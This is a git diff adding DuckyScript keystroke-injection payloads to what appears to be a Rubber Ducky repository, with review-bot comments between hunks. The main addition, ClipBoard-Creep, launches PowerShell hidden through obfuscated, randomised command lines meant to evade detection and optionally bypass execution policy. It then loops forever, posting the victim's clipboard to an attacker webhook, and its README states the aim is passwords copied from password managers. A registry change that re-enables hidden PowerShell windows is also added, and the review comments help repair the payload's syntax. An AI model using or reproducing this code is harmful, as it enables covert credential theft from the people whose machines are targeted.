diff --git a/payloads/extensions/community/Detect_Finished b/payloads/extensions/community/Detect_Finished
new file mode 100644
index 000000000..2bf114f18
--- /dev/null
+++ b/payloads/extensions/community/Detect_Finished
@@ -0,0 +1,31 @@
+EXTENSION Detect_Finished
+ REM VERSION 1.0
+ REM AUTHOR: 0iphor13
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Use the function Detect_Finished() to signal the finished execution of your payload.
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #PAUSE 150
+ FUNCTION Detect_Finished()
+ IF ($_CAPSLOCK_ON == FALSE)
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ ATTACKMODE OFF
+ ELSE IF
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ ATTACKMODE OFF
+ END_IF
+ END_FUNCTION
+END_EXTENSION
diff --git a/payloads/extensions/community/Windows11_Console_Downgrade b/payloads/extensions/community/Windows11_Console_Downgrade
new file mode 100644
index 000000000..5980a6240
--- /dev/null
+++ b/payloads/extensions/community/Windows11_Console_Downgrade
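Review bot: The branch header `IF ($_CAPSLOCK_ON == FALSE)` inside Detect_Finished() has no `THEN`, and the alternative branch is written as `ELSE IF` with no condition, so the function as written is unlikely to compile under DuckyScript 3.0. The two lines should read `IF ($_CAPSLOCK_ON == FALSE) THEN` and `ELSE`. The same two lines recur verbatim in the inline copy of this extension in payload.txt (the `@@ -0,0 +1,211 @@` hunk), which should be fixed together with this file so the two copies do not drift. The REM_BLOCK also never says what the "signal" is; a line such as `Toggles CAPSLOCK four times (three if it was already on) with #PAUSE between presses, ending with it off, then runs ATTACKMODE OFF.` would let a reader know what to watch for.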
@@ -0,0 +1,35 @@
+EXTENSION Windows11_Console_Downgrade
+ REM_BLOCK
+ Version: 1.0
+ Author: 0iphor13
+ Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
+ Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
+ END_REM
+
+ REM CONFIGURATION:
+ REM Used to wait until initial execution
+ DEFINE #INPUT_WAIT 2000
+ REM GUID for using the legacy console host for terminal execution
+ DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D
+
+ FUNCTION Console_Downgrade()
+ DELAY #INPUT_WAIT
+ GUI r
+ DELAY 500
+ STRINGLN powershell -NoP -NonI
+ DELAY 1000
+ STRING Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationConsole -Value "{#CONHOST}";
+ STRINGLN Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationTerminal -Value "{#CONHOST}";exit
+ END_FUNCTION
+
+ REM_BLOCK
+ EXAMPLE USAGE AFTER EXTENSION: Downgrade the command prompt via registry, then open a hidden PS instance and execute Calc.exe.
+ Console_Downgrade()
+ DELAY 2000
+ GUI r
+ DELAY 2000
+ STRINGLN powershell -w h
+ DELAY 1500
+ STRINGLN calc.exe;exit
+ END_REM
+END_EXTENSION
diff --git a/payloads/extensions/community/windows_elevated_execution b/payloads/extensions/community/Windows_Elevated_Execution
similarity index 100%
rename from payloads/extensions/community/windows_elevated_execution
rename to payloads/extensions/community/Windows_Elevated_Execution
diff --git a/payloads/library/exfiltration/ClipBoard-Creep/README.md b/payloads/library/exfiltration/ClipBoard-Creep/README.md
new file mode 100644
index 000000000..67cc32ba3
--- /dev/null
+++ b/payloads/library/exfiltration/ClipBoard-Creep/README.md
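Review bot: Console_Downgrade() writes `DelegationConsole` and `DelegationTerminal` under `HKCU:\Console\%%Startup` and nothing in the extension reads or restores the previous values, yet the REM_BLOCK does not say that the change persists in the user profile after the payload ends or that no cleanup exists; a documentation line such as `NOTE: persistent per-user registry change; the previous DelegationConsole/DelegationTerminal values are not saved or restored.` belongs in the header block. The same block also misspells `paramters`. As a point of style, the initial wait is a DEFINE (`#INPUT_WAIT`) but the `DELAY 500` and `DELAY 1000` inside the function are bare literals, so they cannot be tuned in one place alongside it; a second DEFINE for the in-function delays would match the CONFIGURATION section's own convention.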
@@ -0,0 +1,17 @@
+# Clipboard-Creep #
+Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrates it contents. It was created to get access to passwords copied out of password managers, but might be useful in general.
+
+
+## Usage ##
+### #HOOK ###
+Define your webhook under #HOOK
+
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)
+
+### #CALLBACK_DELAY ###
+Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.
+
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)
+
+After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook.
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)
diff --git a/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png b/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png
new file mode 100644
index 000000000..faa52c9dc
Binary files /dev/null and b/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png differ
diff --git a/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png b/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png
new file mode 100644
index 000000000..c3ce4886e
Binary files /dev/null and b/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png differ
diff --git a/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png b/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png
new file mode 100644
index 000000000..932dc1d70
Binary files /dev/null and b/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png differ
diff --git a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
new file mode 100644
index 000000000..a9a01dc04
--- /dev/null
+++ b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
@@ -0,0 +1,211 @@
+REM Clipboard-Creep
+REM Version 1.0
+REM OS: Windows
+REM Author: 0iphor13
+REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
+REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.
+REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep
+
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
+EXTENSION EXTENSION Rolling_Powershell_Execution
+ REM VERSION 1.0
+ REM Author: 0iphor13
+ REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
+ REM Requirements: PayloadStudio v.1.3 minimum
+ REM Starts Powershell in uncommon ways to avoid basic detection
+ REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.
+
+ REM CONFIGURATION:
+ REM Add ExecutionPolicy bypass
+ DEFINE #EXECUTIONPOLICY FALSE
+ DEFINE #DELAY 500
+
+ $_RANDOM_MIN = 1
+ $_RANDOM_MAX = 16
+ VAR $RANDOM_PS = $_RANDOM_INT
+ FUNCTION Rolling_Powershell_Execution()
+ IF ($RANDOM_PS == 1) THEN
+ STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
+ ELSE IF ($RANDOM_PS == 2) THEN
+ STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
+ ELSE IF ($RANDOM_PS == 3) THEN
+ STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
+ ELSE IF ($RANDOM_PS == 4) THEN
+ STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
+ ELSE IF ($RANDOM_PS == 5) THEN
+ STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
+ ELSE IF ($RANDOM_PS == 6) THEN
+ STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
+ ELSE IF ($RANDOM_PS == 7) THEN
+ STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
+ ELSE IF ($RANDOM_PS == 8) THEN
+ STRING powershell -NoPro -noninT -win h
+ ELSE IF ($RANDOM_PS == 9) THEN
+ STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
+ ELSE IF ($RANDOM_PS == 2) THEN
+ STRING powershell.exe -NoP -nOni -W h
+ ELSE IF ($RANDOM_PS == 10) THEN
+ STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
+ ELSE IF ($RANDOM_PS == 11) THEN
+ STRING powershell -nopr -noninT -W HiddEn
+ ELSE IF ($RANDOM_PS == 12) THEN
+ STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
+ ELSE IF ($RANDOM_PS == 13) THEN
+ STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
+ ELSE IF ($RANDOM_PS == 14) THEN
+ STRING powershell -noproF -noni -W Hi
+ ELSE IF ($RANDOM_PS == 15) THEN
+ STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
+ ELSE ($RANDOM_PS == 16) THEN
+ STRING powershell.exe -noP -nOnI -windo H
+ END_IF
+
+
+
IF_DEFINED_TRUE #EXECUTIONPOLICY
+ SPACE
+ IF (($RANDOM_PS % 2) == 0) THEN
+ STRING -ep ByPasS
+ ELSE IF (($RANDOM_PS % 5) == 0) THEN
+ STRING -exec bypass
+ ELSE IF (($RANDOM_PS % 7) == 0) THEN
+ STRING -exeC byPasS
+ ELSE IF (($RANDOM_PS % 10) == 0) THEN
+ STRING -exEcUtionPoL bYpaSs
+ ELSE IF (($RANDOM_PS % 12) == 0) THEN
+ STRING -exEcUtion bYPaSs
+ ELSE
+ STRING -eP BYPaSs
+ END_IF
+ END_IF_DEFINED
+ ENTER
+ DELAY #DELAY
+ END_FUNCTION
+ REM EXAMPLE USAGE AFTER EXTENSION
+ REM DELAY 2000
+ REM GUI r
+ REM DELAY 2000
+ REM Rolling_Powershell_Execution()
+END_EXTENSION
+
+EXTENSION Detect_Finished
+ REM VERSION 1.0
+ REM AUTHOR: 0iphor13
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Use the function Detect_Finished() to signal the finished execution of your payload.
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #PAUSE 150
+ FUNCTION Detect_Finished()
+ IF ($_CAPSLOCK_ON == FALSE)
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ ATTACKMODE OFF
+ ELSE IF
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ DELAY #PAUSE
+ CAPSLOCK
+ ATTACKMODE OFF
+ END_IF
+ END_FUNCTION
+END_EXTENSION
+
+
+REM Define URL of your catching webhook
+DEFINE #HOOK "https://example.com/"
+REM Define the pause between calls to your webhook.
+DEFINE #CALLBACK_DELAY 12
+
+IF ($_OS == WINDOWS) THEN
+ GUI r
+ DELAY 1000
+ REM randomized and obfuscated way to start powershell
+ Rolling_Powershell_Execution()
+ STRINGLN_POWERSHELL
+ $e = $null
+ while ($true)
+ {
+ $c = Get-Clipboard
+ if ($c)
+ {
+ if ($c -ne $e)
+ {
+ $o = "Clipboard content: $c"
+ irm -Uri #HOOK -Method POST -Body $o
+ } else
+ {
+ $o = "Clipboard content hasn't changed"
+ irm -Uri #HOOK -Method POST -Body $o
+ }
+ $e = $c
+ } else
+ {
+ $o = "Clipboard is empty"
+ irm -Uri #HOOK -Method POST -Body $o
+ }
+ sleep -s #CALLBACK_DELAY
+ }
+ END_STRINGLN
+ ENTER
+ DELAY 250
+ Detect_Finished()
+ELSE
+ ATTACKMODE OFF
+END_IF
+
+
+
+
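Review bot: The header `EXTENSION EXTENSION Rolling_Powershell_Execution` repeats the keyword, so the second extension block is malformed and should read `EXTENSION Rolling_Powershell_Execution`. Inside Rolling_Powershell_Execution() the test `$RANDOM_PS == 2` appears twice, so the second arm (`STRING powershell.exe -NoP -nOni -W h`) can never be selected, and the closing arm `ELSE ($RANDOM_PS == 16) THEN` is not valid IF syntax and should be `ELSE IF ($RANDOM_PS == 16) THEN` or a bare `ELSE`. Since the chain has 17 arms for `$_RANDOM_MAX = 16`, one arm is dead regardless, so either drop the duplicate or renumber and adjust `$_RANDOM_MAX` so the arm count and the random range agree. The inline Detect_Finished extension later in this hunk carries the `IF` without `THEN` and the condition-less `ELSE IF` already raised on the standalone Detect_Finished file.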